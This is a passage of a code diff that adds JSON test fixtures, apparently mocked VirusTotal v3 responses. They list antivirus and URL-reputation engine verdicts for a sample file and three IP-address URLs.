+            },
+            "BitDefenderTheta": {
+                "category": "undetected",
+                "engine_name": "BitDefenderTheta",
+                "engine_version": "7.2.37796.0",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20210921"
+            },
+            "AVG": {
+                "category": "malicious",
+                "engine_name": "AVG",
+                "engine_version": "21.1.5827.0",
+                "result": "Win64:WormX-gen [Wrm]",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Panda": {
+                "category": "undetected",
+                "engine_name": "Panda",
+                "engine_version": "4.6.4.2",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "CrowdStrike": {
+                "category": "malicious",
+                "engine_name": "CrowdStrike",
+                "engine_version": "1.0",
+                "result": "win/malicious_confidence_90% (W)",
+                "method": "blacklist",
+                "engine_update": "20210203"
+            },
+            "MaxSecure": {
+                "category": "undetected",
+                "engine_name": "MaxSecure",
+                "engine_version": "1.0.0.1",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20210925"
+            }
+        },
+        "reputation": 0,
+        "sigma_analysis_stats": {
+            "high": 10,
+            "medium": 1,
+            "critical": 0,
+            "low": 5
+        }
+    }
+}
\ No newline at end of file
diff --git a/tests/testdata/vt3_related_links.json b/tests/testdata/vt3_related_links.json
new file mode 100644
index 000000000..a63bbee64
--- /dev/null
+++ b/tests/testdata/vt3_related_links.json
@@ -0,0 +1,33 @@
+[
+  {
+    "type": "url",
+    "id": "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+    "context_attributes": {
+      "url": "http://218.54.47.77/"
+    }
+  },
+  {
+    "type": "url",
+    "id": "19e1199c6aa6e817845cc025cd7c8979cec22f8c94bc7416ff16b8808706cd54",
+    "context_attributes": {
+      "url": "http://218.54.47.76/"
+    },
+    "attributes": {
+      "attrib1": "value1",
+      "last_analysis_stats": {
+        "malicious": 10,
+        "other": 15
+      }
+    }
+  },
+  {
+    "type": "url",
+    "id": "03283ca11f82c0e152c6f3751f2484289437462afdd14115cd859eef23bead1f",
+    "context_attributes": {
+      "url": "http://218.54.47.74/"
+    },
+    "attributes": {
+      "attrib1": "value1"
+    }
+  }
+]
\ No newline at end of file
diff --git a/tests/testdata/vt3_url_0.json b/tests/testdata/vt3_url_0.json
new file mode 100644
index 000000000..2fd576650
--- /dev/null
+++ b/tests/testdata/vt3_url_0.json
@@ -0,0 +1,432 @@
+{
+  "type": "url",
+  "id": "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+  "attributes": {
+    "last_final_url": "http://218.54.47.77/",
+    "tags": [],
+    "url": "http://218.54.47.77/",
+    "last_analysis_date": 1546957549,
+    "has_content": false,
+    "last_submission_date": 1546957549,
+    "threat_names": [],
+    "last_analysis_results": {
+      "CLEAN MX": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CLEAN MX"
+      },
+      "DNS8": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "DNS8"
+      },
+      "Lionic": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Lionic"
+      },
+      "OpenPhish": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "OpenPhish"
+      },
+      "VX Vault": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "VX Vault"
+      },
+      "ZDB Zeus": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZDB Zeus"
+      },
+      "ZCloudsec": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZCloudsec"
+      },
+      "PhishLabs": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "PhishLabs"
+      },
+      "Zerofox": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Zerofox"
+      },
+      "K7AntiVirus": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "K7AntiVirus"
+      },
+      "SecureBrain": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "SecureBrain"
+      },
+      "Virusdie External Site Scan": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Virusdie External Site Scan"
+      },
+      "Quttera": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Quttera"
+      },
+      "SCUMWARE.org": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "SCUMWARE.org"
+      },
+      "MalwareDomainList": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "MalwareDomainList"
+      },
+      "ZeusTracker": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZeusTracker"
+      },
+      "zvelo": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "zvelo"
+      },
+      "Google Safebrowsing": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Google Safebrowsing"
+      },
+      "Kaspersky": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Kaspersky"
+      },
+      "BitDefender": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "BitDefender"
+      },
+      "Opera": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Opera"
+      },
+      "Certly": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Certly"
+      },
+      "G-Data": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "G-Data"
+      },
+      "C-SIRT": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "C-SIRT"
+      },
+      "CyberCrime": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CyberCrime"
+      },
+      "Malware Domain Blocklist": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malware Domain Blocklist"
+      },
+      "MalwarePatrol": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "MalwarePatrol"
+      },
+      "Trustwave": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Trustwave"
+      },
+      "Web Security Guard": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Web Security Guard"
+      },
+      "CyRadar": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CyRadar"
+      },
+      "desenmascara.me": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "desenmascara.me"
+      },
+      "ADMINUSLabs": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ADMINUSLabs"
+      },
+      "Malwarebytes hpHosts": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malwarebytes hpHosts"
+      },
+      "Dr.Web": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Dr.Web"
+      },
+      "AlienVault": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "AlienVault"
+      },
+      "Emsisoft": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Emsisoft"
+      },
+      "Rising": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Rising"
+      },
+      "Malc0de Database": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malc0de Database"
+      },
+      "malwares.com URL checker": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "malwares.com URL checker"
+      },
+      "Phishtank": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Phishtank"
+      },
+      "Malwared": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malwared"
+      },
+      "Avira": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Avira"
+      },
+      "NotMining": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "NotMining"
+      },
+      "StopBadware": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "StopBadware"
+      },
+      "Antiy-AVL": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Antiy-AVL"
+      },
+      "Forcepoint ThreatSeeker": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Forcepoint ThreatSeeker"
+      },
+      "FraudSense": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "FraudSense"
+      },
+      "Comodo Site Inspector": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Comodo Site Inspector"
+      },
+      "Malekal": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malekal"
+      },
+      "ESET": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ESET"
+      },
+      "Sophos": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Sophos"
+      },
+      "Yandex Safebrowsing": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Yandex Safebrowsing"
+      },
+      "Spam404": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Spam404"
+      },
+      "Nucleon": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Nucleon"
+      },
+      "Sucuri SiteCheck": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Sucuri SiteCheck"
+      },
+      "Blueliv": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Blueliv"
+      },
+      "Netcraft": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Netcraft"
+      },
+      "AutoShun": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "AutoShun"
+      },
+      "ThreatHive": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ThreatHive"
+      },
+      "FraudScore": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "FraudScore"
+      },
+      "Tencent": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Tencent"
+      },
+      "URLQuery": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "URLQuery"
+      },
+      "Fortinet": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Fortinet"
+      },
+      "ZeroCERT": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZeroCERT"
+      },
+      "Baidu-International": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Baidu-International"
+      },
+      "securolytics": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "securolytics"
+      }
+    },
+    "reputation": 0,
+    "categories": {
+      "Forcepoint ThreatSeeker": "uncategorized"
+    },
+    "last_modification_date": 1546957553,
+    "last_analysis_stats": {
+      "harmless": 57,
+      "malicious": 0,
+      "suspicious": 0,
+      "undetected": 9,
+      "timeout": 0
+    },
+    "times_submitted": 4,
+    "first_submission_date": 1414741297,
+    "total_votes": {
+      "harmless": 0,
+      "malicious": 0
+    }
+  },
+  "context_attributes": {
+    "url": "http://218.54.47.77/"
+  }
+}
\ No newline at end of file
diff --git a/tests/testdata/vt3_url_1.json b/tests/testdata/vt3_url_1.json
new file mode 100644
index 000000000..7c8d3f4e7
--- /dev/null
+++ b/tests/testdata/vt3_url_1.json
@@ -0,0 +1,516 @@
+{
+  "type": "url",
+  "id": "19e1199c6aa6e817845cc025cd7c8979cec22f8c94bc7416ff16b8808706cd54",
+  "attributes": {
+    "last_final_url": "http://218.54.47.76/",
+    "tags": [
+      "ip"
+    ],
+    "url": "http://218.54.47.76/",
+    "last_analysis_date": 1590078613,
+    "has_content": false,
+    "last_submission_date": 1590078613,
+    "threat_names": [],
+    "last_analysis_results": {
+      "Botvrij.eu": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Botvrij.eu"
+      },
+      "Feodo Tracker": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Feodo Tracker"
+      },
+      "CLEAN MX": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CLEAN MX"
+      },
+      "DNS8": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "DNS8"
+      },
+      "Lionic": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Lionic"
+      },
+      "Snort IP sample list": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Snort IP sample list"
+      },
+      "VX Vault": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "VX Vault"
+      },
+      "securolytics": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "securolytics"
+      },
+      "Tencent": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Tencent"
+      },
+      "MalwarePatrol": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "MalwarePatrol"
+      },
+      "MalSilo": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "MalSilo"
+      },
+      "Comodo Valkyrie Verdict": {
+        "category": "malicious",
+        "result": "malware",
+        "method": "blacklist",
+        "engine_name": "Comodo Valkyrie Verdict"
+      },
+      "PhishLabs": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "PhishLabs"
+      },
+      "EmergingThreats": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "EmergingThreats"
+      },
+      "Sangfor": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Sangfor"
+      },
+      "K7AntiVirus": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "K7AntiVirus"
+      },
+      "Virusdie External Site Scan": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Virusdie External Site Scan"
+      },
+      "Artists Against 419": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Artists Against 419"
+      },
+      "IPsum": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "IPsum"
+      },
+      "Cyren": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Cyren"
+      },
+      "Quttera": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Quttera"
+      },
+      "CINS Army": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CINS Army"
+      },
+      "SCUMWARE.org": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "SCUMWARE.org"
+      },
+      "MalwareDomainList": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "MalwareDomainList"
+      },
+      "Lumu": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Lumu"
+      },
+      "zvelo": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "zvelo"
+      },
+      "Google Safebrowsing": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Google Safebrowsing"
+      },
+      "Kaspersky": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Kaspersky"
+      },
+      "BitDefender": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "BitDefender"
+      },
+      "GreenSnow": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "GreenSnow"
+      },
+      "G-Data": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "G-Data"
+      },
+      "OpenPhish": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "OpenPhish"
+      },
+      "Malware Domain Blocklist": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malware Domain Blocklist"
+      },
+      "AutoShun": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "AutoShun"
+      },
+      "Trustwave": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Trustwave"
+      },
+      "Web Security Guard": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Web Security Guard"
+      },
+      "Cyan": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Cyan"
+      },
+      "CyRadar": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CyRadar"
+      },
+      "desenmascara.me": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "desenmascara.me"
+      },
+      "ADMINUSLabs": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ADMINUSLabs"
+      },
+      "Malwarebytes hpHosts": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malwarebytes hpHosts"
+      },
+      "Dr.Web": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Dr.Web"
+      },
+      "AlienVault": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "AlienVault"
+      },
+      "Emsisoft": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Emsisoft"
+      },
+      "Spamhaus": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Spamhaus"
+      },
+      "malwares.com URL checker": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "malwares.com URL checker"
+      },
+      "Phishtank": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Phishtank"
+      },
+      "EonScope": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "EonScope"
+      },
+      "Malwared": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malwared"
+      },
+      "Avira": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Avira"
+      },
+      "NotMining": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "NotMining"
+      },
+      "CyberCrime": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CyberCrime"
+      },
+      "Antiy-AVL": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Antiy-AVL"
+      },
+      "Forcepoint ThreatSeeker": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Forcepoint ThreatSeeker"
+      },
+      "Spam404": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Spam404"
+      },
+      "Certego": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Certego"
+      },
+      "Yandex Safebrowsing": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Yandex Safebrowsing"
+      },
+      "ESET": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ESET"
+      },
+      "Threatsourcing": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Threatsourcing"
+      },
+      "URLhaus": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "URLhaus"
+      },
+      "SecureBrain": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "SecureBrain"
+      },
+      "Nucleon": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Nucleon"
+      },
+      "PREBYTES": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "PREBYTES"
+      },
+      "Sophos": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Sophos"
+      },
+      "Blueliv": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Blueliv"
+      },
+      "BlockList": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "BlockList"
+      },
+      "Netcraft": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Netcraft"
+      },
+      "CRDF": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CRDF"
+      },
+      "ThreatHive": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ThreatHive"
+      },
+      "BADWARE.INFO": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "BADWARE.INFO"
+      },
+      "FraudScore": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "FraudScore"
+      },
+      "Quick Heal": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Quick Heal"
+      },
+      "Rising": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Rising"
+      },
+      "StopBadware": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "StopBadware"
+      },
+      "Sucuri SiteCheck": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Sucuri SiteCheck"
+      },
+      "Fortinet": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Fortinet"
+      },
+      "StopForumSpam": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "StopForumSpam"
+      },
+      "ZeroCERT": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZeroCERT"
+      },
+      "Baidu-International": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Baidu-International"
+      },
+      "Phishing Database": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Phishing Database"
+      }
+    },
+    "reputation": 0,
+    "categories": {},
+    "last_modification_date": 1590078664,
+    "last_analysis_stats": {
+      "harmless": 69,
+      "malicious": 1,
+      "suspicious": 0,
+      "undetected": 10,
+      "timeout": 0
+    },
+    "times_submitted": 26,
+    "first_submission_date": 1412385256,
+    "total_votes": {
+      "harmless": 0,
+      "malicious": 0
+    }
+  },
+  "context_attributes": {
+    "url": "http://218.54.47.76/"
+  }
+}
\ No newline at end of file
diff --git a/tests/testdata/vt3_url_2.json b/tests/testdata/vt3_url_2.json
new file mode 100644
index 000000000..f6290de1c
--- /dev/null
+++ b/tests/testdata/vt3_url_2.json
@@ -0,0 +1,448 @@
+{
+  "type": "url",
+  "id": "03283ca11f82c0e152c6f3751f2484289437462afdd14115cd859eef23bead1f",
+  "attributes": {
+    "last_final_url": "http://218.54.47.74/",
+    "tags": [],
+    "url": "http://218.54.47.74/",
+    "last_analysis_date": 1537448261,
+    "has_content": false,
+    "last_submission_date": 1537448261,
+    "threat_names": [],
+    "last_analysis_results": {
+      "CLEAN MX": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CLEAN MX"
+      },
+      "DNS8": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "DNS8"
+      },
+      "Lionic": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Lionic"
+      },
+      "VX Vault": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "VX Vault"
+      },
+      "ZDB Zeus": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZDB Zeus"
+      },
+      "Tencent": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Tencent"
+      },
+      "MalwarePatrol": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "MalwarePatrol"
+      },
+      "Netcraft": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Netcraft"
+      },
+      "PhishLabs": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "PhishLabs"
+      },
+      "Zerofox": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Zerofox"
+      },
+      "K7AntiVirus": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "K7AntiVirus"
+      },
+      "Virusdie External Site Scan": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Virusdie External Site Scan"
+      },
+      "Spamhaus": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Spamhaus"
+      },
+      "Quttera": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Quttera"
+      },
+      "SCUMWARE.org": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "SCUMWARE.org"
+      },
+      "MalwareDomainList": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "MalwareDomainList"
+      },
+      "ZeusTracker": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZeusTracker"
+      },
+      "zvelo": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "zvelo"
+      },
+      "Google Safebrowsing": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Google Safebrowsing"
+      },
+      "Kaspersky": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Kaspersky"
+      },
+      "BitDefender": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "BitDefender"
+      },
+      "Dr.Web": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Dr.Web"
+      },
+      "G-Data": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "G-Data"
+      },
+      "OpenPhish": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "OpenPhish"
+      },
+      "Malware Domain Blocklist": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malware Domain Blocklist"
+      },
+      "AutoShun": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "AutoShun"
+      },
+      "Webutation": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Webutation"
+      },
+      "Trustwave": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Trustwave"
+      },
+      "Web Security Guard": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Web Security Guard"
+      },
+      "CyRadar": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CyRadar"
+      },
+      "desenmascara.me": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "desenmascara.me"
+      },
+      "ADMINUSLabs": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ADMINUSLabs"
+      },
+      "Malwarebytes hpHosts": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malwarebytes hpHosts"
+      },
+      "Opera": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Opera"
+      },
+      "AlienVault": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "AlienVault"
+      },
+      "Emsisoft": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Emsisoft"
+      },
+      "Malc0de Database": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malc0de Database"
+      },
+      "malwares.com URL checker": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "malwares.com URL checker"
+      },
+      "Phishtank": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Phishtank"
+      },
+      "Malwared": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malwared"
+      },
+      "Avira": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Avira"
+      },
+      "NotMining": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "NotMining"
+      },
+      "CyberCrime": {
